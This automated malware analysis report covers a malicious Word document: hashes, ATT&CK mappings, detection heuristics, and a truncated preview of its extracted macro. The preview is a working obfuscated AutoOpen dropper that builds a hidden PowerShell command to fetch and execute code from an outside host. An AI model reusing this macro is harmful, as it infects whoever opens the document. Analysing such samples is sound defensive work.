Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 8cc7c6b9b105946a…

MALICIOUS

Office (OLE)

Size: 267.5 KB
Created: 2018-03-01 18:39:00
Authoring application: Microsoft Office Word
First seen: 2019-11-20
MD5: 499ad0292f66c75078877495de93fd22
SHA-1: 5a12b673a00d7c19eca13822ab1eb1b74a5b40a8
SHA-256: 8cc7c6b9b105946a54965a697d3292ac9648bdbe046f70f159222efe81e7277c
Risk Score: 242

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1204.002 Malicious File
  • T1105 Ingress Tool Transfer

The sample is a malicious Office document containing a VBA macro with an AutoOpen function, so the macro runs as soon as the document is opened with macros enabled. The macro uses a Shell() call to execute a command, most likely to download and run a second-stage payload. The ClamAV detection name 'Doc.Dropper.Agent-6467498-0' is consistent with dropper behaviour.

Heuristics (7)

  • ClamAV: Doc.Dropper.Agent-6467498-0 — critical — CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6467498-0
  • VBA macros detected — medium — 3 related findings — OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA — critical — OLE_VBA_SHELL
    The VBA code contains a Shell() call, which executes an arbitrary command line
  • AutoOpen macro — high — OLE_VBA_AUTOOPEN
    The VBA project defines an AutoOpen procedure, which Word runs automatically when the document is opened
  • VBA p-code auto-exec with execution tokens — high — OLE_VBA_PCODE_AUTOEXEC_EXEC
    The compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only macro documents, or documents where source extraction failed, so that visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker — medium — OLE_LEGACY_WORDBASIC_AUTOEXEC
    The OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence of an old Word macro execution surface; by itself it is not an attribution to a downloader or a parser CVE.
  • Embedded URL — info — EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main — in document text (OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 5828 bytes
SHA-256: 1e5c4c1d5fdda89be2faa10795a99c941edabe2aeb386746ff232e2be2e88555

Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "bet"
Sub AutoOpen()
    Dim HM_SI As String
    EQ_QH = Array("i", "l", "c", "h", "e", "u", "d", "p", "a", "y", " ", "w", "s", "-", "r", "t", "n", "o", "x", "b")
    Dim EK_PI As String
    EK_PI = "ZgB1AG4AYwB0AGkAbwBuACAAY"
    HM_SI = HM_SI + EQ_QH(7)
    HM_SI = HM_SI + EQ_QH(17)
    Dim FS_KI As String
    FS_KI = "QAoACQAeAApAHsAcgBlAHQAdQByAG4AIABbAFMAeQBzAHQ"
    HM_SI = HM_SI + EQ_QH(11)
    HM_SI = HM_SI + EQ_QH(4)
    Dim BS_KB As String
    BS_KB = "AZQBtAC4AVABlAH"
    HM_SI = HM_SI + EQ_QH(14)
    HM_SI = HM_SI + EQ_QH(12)
    Dim DT_NC As String
    DT_NC = "gAdAAuAEUAbgBjAG8AZAB"
    HM_SI = HM_SI + EQ_QH(3)
    HM_SI = HM_SI + EQ_QH(4)
    Dim IS_PJ As String
    IS_PJ = "pAG4AZw"
    BL_QE = BL_QE & EK_PI & FS_KI & BS_KB & DT_NC & IS_PJ
    HM_SI = HM_SI + EQ_QH(1)
    HM_SI = HM_SI + EQ_QH(1)
    Dim JP_LH As String
    JP_LH = "BdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIA"
    HM_SI = HM_SI + EQ_QH(10)
    HM_SI = HM_SI + EQ_QH(13)
    Dim BS_RH As String
    BS_RH = "aQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdA"
    HM_SI = HM_SI + EQ_QH(11)
    HM_SI = HM_SI + EQ_QH(0)
    Dim DP_TJ As String
    DP_TJ = "BdADoAOgBGAHI"
    HM_SI = HM_SI + EQ_QH(16)
    HM_SI = HM_SI + EQ_QH(6)
    Dim JT_SH As String
    JT_SH = "AbwBtAEIAYQBzAGUANgA0AFMAdAByA"
    HM_SI = HM_SI + EQ_QH(17)
    HM_SI = HM_SI + EQ_QH(11)
    Dim IN_TA As String
    IN_TA = "GkAbgBnACgAJAB4ACkAKQB9ADsAaQBlAHgAIAAkAC"
    BL_QE = BL_QE & JP_LH & BS_RH & DP_TJ & JT_SH & IN_TA
    HM_SI = HM_SI + EQ_QH(12)
    HM_SI = HM_SI + EQ_QH(15)
    Dim BT_NC As String
    BT_NC = "gAYQAgACQAKAAkACgAJAAoAGkAbgB2AG8AawBlAC0AdwBl"
    HM_SI = HM_SI + EQ_QH(9)
    HM_SI = HM_SI + EQ_QH(1)
    Dim IQ_KC As String
    IQ_KC = "AGIAcgBlAHEAdQBlAHMAdAAgACcAaAB0AHQAcA"
    HM_SI = HM_SI + EQ_QH(4)
    HM_SI = HM_SI + EQ_QH(10)
    Dim HN_RB As String
    HN_RB = "BzADoALwAvAHUAcwBwAHIAZAA1ADEANQAwAGMAZQBuAHQAcgB"
    HM_SI = HM_SI + EQ_QH(3)
    HM_SI = HM_SI + EQ_QH(0)
    Dim BQ_NE As String
    BQ_NE = "hAGwALgB0AGEAYgBsAGUALgBjAG8AcgBlAC4AdwBpAG"
    HM_SI = HM_SI + EQ_QH(6)
    HM_SI = HM_SI + EQ_QH(6)
    Dim JK_KG As String
    JK_KG = "4AZABvAHcAcwAuAG4AZQB0AC8AdwBhAHIAZQBoA"
    BL_QE = BL_QE & BT_NC & IQ_KC & HN_RB & BQ_NE & JK_KG
    HM_SI = HM_SI + EQ_QH(4)
    HM_SI = HM_SI + EQ_QH(16)
    Dim DT_KI As String
    DT_KI = "G8AdQBzAGUAPwAkAGYAaQBsAHQAZQByAD0AU"
    HM_SI = HM_SI + EQ_QH(10)
    HM_SI = HM_SI + EQ_QH(13)
    Dim JT_OH As String
    JT_OH = "ABhAHIAdABpAHQAaQBvAG4ASwB"
    HM_SI = HM_SI + EQ_QH(4)
    HM_SI = HM_SI + EQ_QH(18)
    Dim GO_QD As String
    GO_QD = "lAHkAJQAyADAAZQBxACUAMgAwACUAMgA3AHMAdABhAG"
    HM_SI = HM_SI + EQ_QH(4)
    HM_SI = HM_SI + EQ_QH(2)
    Dim CQ_LA As String
    CQ_LA = "cAZQAlADIANwAmACQAUwBlAG"
    HM_SI = HM_SI + EQ_QH(5)
    HM_SI = HM_SI + EQ_QH(15)
    Dim CL_OB As String
    CL_OB = "wAZQBjAHQAPQB"
    BL_QE = BL_QE & DT_KI & JT_OH & GO_QD & CQ_LA & CL_OB
    HM_SI = HM_SI + EQ_QH(0)
    HM_SI = HM_SI + EQ_QH(17)
    Dim BN_OB As String
    BN_OB = "kAGEAdABhACYAcwB2AD0AMgAwADEANwAt"
    HM_SI = HM_SI + EQ_QH(16)
    HM_SI = HM_SI + EQ_QH(7)
    Dim BQ_NJ As String
    BQ_NJ = "ADAANAAtADEANwAmAHMAcwA9AGIAZgBx"
    HM_SI = HM_SI + EQ_QH(17)
    HM_SI = HM_SI + EQ_QH(1)
    Dim BO_OJ As String
    BO_OJ = "AHQAJgBzAHIAdAA9AH"
    HM_SI = HM_SI + EQ_QH(0)
    HM_SI = HM_SI + EQ_QH(2)
    Dim BM_TC As String
    BM_TC = "MAYwBvACYAcwBwAD0AcgB3AGQAbABhAG"
    HM_SI = HM_SI + EQ_QH(9)
    HM_SI = HM_SI + EQ_QH(10)
    Dim GL_PD As String
    GL_PD = "MAdQBwACYAcwBlAD0AMgAwADEANwAtADEA"
    BL_QE = BL_QE & BN_OB & BQ_NJ & BO_OJ & BM_TC & GL_PD
    HM_SI = HM_SI + EQ_QH(19)
    HM_SI = HM_SI 
... (truncated)